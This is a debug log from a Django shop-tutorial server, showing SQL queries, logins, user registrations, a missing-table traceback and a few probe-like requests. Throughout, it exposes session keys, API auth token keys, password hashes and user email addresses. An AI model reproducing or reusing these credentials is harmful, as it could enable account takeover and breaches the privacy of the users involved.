"django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 37, 5, 519747, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:37:05,577 utils 18694 139696059688704 (0.003) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:37:05.573133+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 37, 5, 573133, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 07:37:05] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-11-29 07:37:13,699 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:37:13.690514+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 37, 13, 690514, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:37:13,703 utils 18694 139696059688704 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'webexpert987@gmail.com'; args=('webexpert987@gmail.com',) DEBUG 2019-11-29 07:37:13,967 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:37:13.965008+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 37, 13, 965008, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 07:37:13] "POST /login/?next=/ HTTP/1.0" 200 1964 [29/Nov/2019 07:37:14] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 DEBUG 2019-11-29 07:37:33,586 utils 18694 139696059688704 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:37:33.571887+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 37, 33, 571887, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:37:33,592 utils 18694 139696059688704 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'postgres'; args=('postgres',) DEBUG 2019-11-29 07:37:33,923 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:37:33.921827+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 37, 33, 921827, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 07:37:33] "POST /login/?next=/ HTTP/1.0" 200 1950 Not Found: /.well-known/pki-validation/D2313C33784AA375898C84C03664BA42.txt [29/Nov/2019 07:40:02] "GET /.well-known/pki-validation/D2313C33784AA375898C84C03664BA42.txt HTTP/1.0" 404 6567 Not Found: /.well-known/pki-validation/22A08C2639F542A1FDD6581F6D2CD14B.txt [29/Nov/2019 07:40:03] "GET /.well-known/pki-validation/22A08C2639F542A1FDD6581F6D2CD14B.txt HTTP/1.0" 404 6571 [29/Nov/2019 07:40:09] "GET / HTTP/1.0" 302 0 /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/urls.py changed, reloading. Performing system checks... November 28, 2019 - 14:04:42 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader DEBUG 2019-11-29 07:42:23,697 utils 26497 140668663965440 (0.004) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-11-29 07:42:23,700 utils 26497 140668663965440 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 2019-11-29 07:42:33,004 utils 26497 140668563928832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'login'; args=('login',) DEBUG 2019-11-29 07:42:33,028 utils 26497 140668563928832 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-29 07:42:33,029 utils 26497 140668563928832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 07:42:33,031 utils 26497 140668563928832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 07:42:33,032 utils 26497 140668563928832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'login' LIMIT 21; args=('login',) DEBUG 2019-11-29 07:42:33,033 utils 26497 140668563928832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 07:42:33,034 utils 26497 140668563928832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'login' LIMIT 21; args=('login',) DEBUG 2019-11-29 07:42:33,035 utils 26497 140668563928832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'login' LIMIT 21; args=('login',) DEBUG 2019-11-29 07:42:33,036 utils 26497 140668563928832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'login' LIMIT 21; args=('login',) DEBUG 2019-11-29 07:42:33,042 utils 26497 140668563928832 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:42:33.038506+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 42, 33, 38506, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') Internal Server Error: /login/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 12, in product_list category = get_object_or_404(Category, slug=category_slug) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 93, in get_object_or_404 return queryset.get(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 402, in get num = len(clone) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [29/Nov/2019 07:42:33] "GET /login/?next=/ HTTP/1.0" 500 133301 /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/urls.py changed, reloading. Performing system checks... System check identified no issues (0 silenced). November 29, 2019 - 07:42:23 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 1 issue (0 silenced). DEBUG 2019-11-29 07:42:47,619 utils 26516 139834464409344 (0.004) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-11-29 07:42:47,622 utils 26516 139834464409344 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 2019-11-29 07:42:50,144 utils 26516 139834431227648 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:42:50.130167+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 42, 50, 130167, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:42:50,229 utils 26516 139834431227648 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:42:50.226694+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 42, 50, 226694, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 07:42:50] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Nov/2019 07:45:14] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 07:45:53,258 utils 26516 139834431227648 (0.003) SELECT (1) AS "a" FROM "auth_user" WHERE "auth_user"."username" = 'foobar123' LIMIT 1; args=('foobar123',) DEBUG 2019-11-29 07:45:53,260 utils 26516 139834431227648 (0.000) SELECT (1) AS "a" FROM "auth_user" WHERE "auth_user"."email" = 'foobar123@example.com' LIMIT 1; args=('foobar123@example.com',) Bad Request: /api/register [29/Nov/2019 07:45:53] "POST /api/register HTTP/1.0" 400 82 DEBUG 2019-11-29 07:46:03,813 utils 26516 139834431227648 (0.002) SELECT (1) AS "a" FROM "auth_user" WHERE "auth_user"."username" = 'foobar1234' LIMIT 1; args=('foobar1234',) DEBUG 2019-11-29 07:46:03,815 utils 26516 139834431227648 (0.000) SELECT (1) AS "a" FROM "auth_user" WHERE "auth_user"."email" = 'foobar1234@example.com' LIMIT 1; args=('foobar1234@example.com',) DEBUG 2019-11-29 07:46:04,049 utils 26516 139834431227648 (0.004) INSERT INTO "auth_user" ("password", "last_login", "is_superuser", "username", "first_name", "last_name", "email", "is_staff", "is_active", "date_joined") VALUES ('pbkdf2_sha256$150000$tduqzZUYVHJH$jCxr/8ZJj5kHWzpSYqTAWsrS3CorGjLOxpcIg+TEdkg=', NULL, false, 'foobar1234', '', '', 'foobar1234@example.com', false, true, '2019-11-29T07:46:03.816035+00:00'::timestamptz) RETURNING "auth_user"."id"; args=('pbkdf2_sha256$150000$tduqzZUYVHJH$jCxr/8ZJj5kHWzpSYqTAWsrS3CorGjLOxpcIg+TEdkg=', None, False, 'foobar1234', '', '', 'foobar1234@example.com', False, True, datetime.datetime(2019, 11, 29, 7, 46, 3, 816035, tzinfo=)) DEBUG 2019-11-29 07:46:04,076 utils 26516 139834431227648 (0.004) INSERT INTO "authtoken_token" ("key", "user_id", "created") VALUES ('d6af0d10821c77a86f93276b8f3d0fafcdb50348', 3, '2019-11-29T07:46:04.072666+00:00'::timestamptz); args=('d6af0d10821c77a86f93276b8f3d0fafcdb50348', 3, datetime.datetime(2019, 11, 29, 7, 46, 4, 72666, tzinfo=)) [29/Nov/2019 07:46:04] "POST /api/register HTTP/1.0" 201 116 [29/Nov/2019 07:50:17] "GET / HTTP/1.0" 302 0 /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/settings.py changed, reloading. Performing system checks... November 29, 2019 - 07:42:47 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 1 issue (0 silenced). DEBUG 2019-11-29 07:50:27,262 utils 26892 139790605371136 (0.005) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-11-29 07:50:27,268 utils 26892 139790605371136 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() [29/Nov/2019 07:50:56] "OPTIONS /api/register HTTP/1.0" 200 187 DEBUG 2019-11-29 07:50:56,531 utils 26892 139790504961792 (0.004) SELECT (1) AS "a" FROM "auth_user" WHERE "auth_user"."username" = 'webt' LIMIT 1; args=('webt',) DEBUG 2019-11-29 07:50:56,533 utils 26892 139790504961792 (0.001) SELECT (1) AS "a" FROM "auth_user" WHERE "auth_user"."email" = 'webt@gmail.com' LIMIT 1; args=('webt@gmail.com',) DEBUG 2019-11-29 07:50:56,753 utils 26892 139790504961792 (0.003) INSERT INTO "auth_user" ("password", "last_login", "is_superuser", "username", "first_name", "last_name", "email", "is_staff", "is_active", "date_joined") VALUES ('pbkdf2_sha256$150000$eezRS8rgBwHb$e8JMvHFA1QWfqWFDCMDac9x/0fVLmOj5IoI58fEI1Xw=', NULL, false, 'webt', '', '', 'webt@gmail.com', false, true, '2019-11-29T07:50:56.538845+00:00'::timestamptz) RETURNING "auth_user"."id"; args=('pbkdf2_sha256$150000$eezRS8rgBwHb$e8JMvHFA1QWfqWFDCMDac9x/0fVLmOj5IoI58fEI1Xw=', None, False, 'webt', '', '', 'webt@gmail.com', False, True, datetime.datetime(2019, 11, 29, 7, 50, 56, 538845, tzinfo=)) DEBUG 2019-11-29 07:50:56,767 utils 26892 139790504961792 (0.002) INSERT INTO "authtoken_token" ("key", "user_id", "created") VALUES ('6d29cfd62b787f7fa2e1db747651b85c5677e7f9', 4, '2019-11-29T07:50:56.765325+00:00'::timestamptz); args=('6d29cfd62b787f7fa2e1db747651b85c5677e7f9', 4, datetime.datetime(2019, 11, 29, 7, 50, 56, 765325, tzinfo=)) [29/Nov/2019 07:50:56] "POST /api/register HTTP/1.0" 201 102 /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/middleware.py changed, reloading. Performing system checks... November 29, 2019 - 07:50:27 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 1 issue (0 silenced). DEBUG 2019-11-29 07:51:52,329 utils 26976 140080060684032 (0.004) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-11-29 07:51:52,334 utils 26976 140080060684032 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/middleware.py changed, reloading. Performing system checks... November 29, 2019 - 07:51:52 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 1 issue (0 silenced). DEBUG 2019-11-29 07:53:25,736 utils 26999 140702638909184 (0.004) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-11-29 07:53:25,742 utils 26999 140702638909184 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() [29/Nov/2019 07:55:01] "GET /whm-server-status HTTP/1.0" 301 0 [29/Nov/2019 07:55:26] "GET / HTTP/1.0" 302 0 [29/Nov/2019 08:00:30] "GET / HTTP/1.0" 302 0 [29/Nov/2019 08:05:37] "GET / HTTP/1.0" 302 0 [29/Nov/2019 08:10:44] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [29/Nov/2019 08:13:20] "GET /proxy.php HTTP/1.0" 404 6409 [29/Nov/2019 08:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [29/Nov/2019 08:15:46] "GET / HTTP/1.0" 302 0 [29/Nov/2019 08:20:56] "GET / HTTP/1.0" 302 0 [29/Nov/2019 08:26:02] "GET / HTTP/1.0" 302 0 [29/Nov/2019 08:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [29/Nov/2019 08:31:06] "GET / HTTP/1.0" 302 0 [29/Nov/2019 08:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [29/Nov/2019 08:36:14] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 08:36:47,335 utils 26999 140702605727488 (0.006) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T08:36:47.318144+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 29, 8, 36, 47, 318144, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [29/Nov/2019 08:36:47] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [29/Nov/2019 08:36:47] "GET /robots.txt HTTP/1.0" 404 6408 DEBUG 2019-11-29 08:36:47,742 utils 26999 140702605727488 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T08:36:47.733493+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 29, 8, 36, 47, 733493, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-29 08:36:47,787 utils 26999 140702605727488 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T08:36:47.784910+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 8, 36, 47, 784910, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [29/Nov/2019 08:36:47] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Nov/2019 08:36:48] "GET /static/admin/css/login.css HTTP/1.0" 304 0 [29/Nov/2019 08:36:48] "GET /static/admin/css/responsive.css HTTP/1.0" 304 0 [29/Nov/2019 08:36:48] "GET /static/admin/css/base.css HTTP/1.0" 304 0 [29/Nov/2019 08:36:49] "GET /static/admin/css/fonts.css HTTP/1.0" 304 0 [29/Nov/2019 08:36:49] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 304 0 [29/Nov/2019 08:36:49] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 304 0 DEBUG 2019-11-29 08:36:55,367 utils 26999 140702605727488 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T08:36:55.352814+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 29, 8, 36, 55, 352814, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-29 08:36:55,375 utils 26999 140702605727488 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'webt'; args=('webt',) DEBUG 2019-11-29 08:36:55,673 utils 26999 140702605727488 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T08:36:55.671095+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 8, 36, 55, 671095, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [29/Nov/2019 08:36:55] "POST /login/?next=/ HTTP/1.0" 200 1946 [29/Nov/2019 08:36:56] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 304 0 DEBUG 2019-11-29 08:37:05,281 utils 26999 140702605727488 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T08:37:05.272655+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 29, 8, 37, 5, 272655, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-29 08:37:05,285 utils 26999 140702605727488 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'webt'; args=('webt',) DEBUG 2019-11-29 08:37:05,574 utils 26999 140702605727488 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T08:37:05.572235+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 8, 37, 5, 572235, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [29/Nov/2019 08:37:05] "POST /login/?next=/ HTTP/1.0" 200 1946 DEBUG 2019-11-29 08:37:12,592 utils 26999 140702605727488 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T08:37:12.583981+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 29, 8, 37, 12, 583981, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-29 08:37:12,595 utils 26999 140702605727488 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'webt'; args=('webt',) DEBUG 2019-11-29 08:37:12,840 utils 26999 140702605727488 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T08:37:12.838021+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 8, 37, 12, 838021, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [29/Nov/2019 08:37:12] "POST /login/?next=/ HTTP/1.0" 